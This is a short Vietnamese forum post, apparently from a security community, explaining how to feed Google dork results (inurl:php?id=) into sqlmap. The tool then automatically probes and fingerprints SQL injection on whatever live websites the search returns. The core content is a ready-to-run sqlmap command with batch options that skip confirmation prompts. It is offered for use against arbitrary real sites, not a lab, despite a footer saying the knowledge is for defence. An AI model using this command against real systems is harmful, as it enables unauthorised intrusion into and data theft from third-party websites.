Sử dụng sqlmap và google dork để tìm và khai thác lỗi sql injection

DDos

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Sử dụng sqlmap và google dork để tìm và khai thác lỗi sql injection
DDos
Có một tùy chọn trong sqlmap mà ít người biết đến, đó là việc sử dụng kết quả tìm kiếm của google để tìm và khai thác lỗi sql injection. Trong bài viết này mình sẽ hướng dẫn các bạn cách kết hợp hai ccoong cụ này nhé.
  1. Mở cmd và nhập lệnh: ipconfig /flushdns
  2. Chạy sqlmap với lệnh:

    python sqlmap.py -g “inurl:”php?id=”” –random-agent -f –batch –answer=”extending=N,follow=N,keep=N,exploit=n”

    Bạn có thể thay giá trị của tham số g với một giá trị dork khác.
  3. Tận hưởng thành quả :D


    Capture-15.png

Mình có làm video sử dụng công nghệ này, các bạn có thể xem để rõ hơn nhé:


[YOUTUBE]https://www.youtube.com/watch?v=2PxKNop0_P8[/YOUTUBE]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bạn phải đăng nhập hoặc đăng ký để phản hồi tại đây.
Bài viết liên quan
  • Web Pentest - Bài 8: Một số extension trên Burp Suite giúp bạn pentest tốt hơn
  • Web Pentest - Bài 2: Sử dụng kỹ thuật Brute force để dò tìm đường dẫn và password
  • Web Pentest - Bài 1: Burp Academy và Giới thiệu về Burp Suite
  • Tìm hiểu các loại tấn công bằng Burp Suite Intruder
  • Sơ lược về kỹ thuật hack Full path disclosure ( FPD )
  • Lỗi burpsuite
    • Bên trên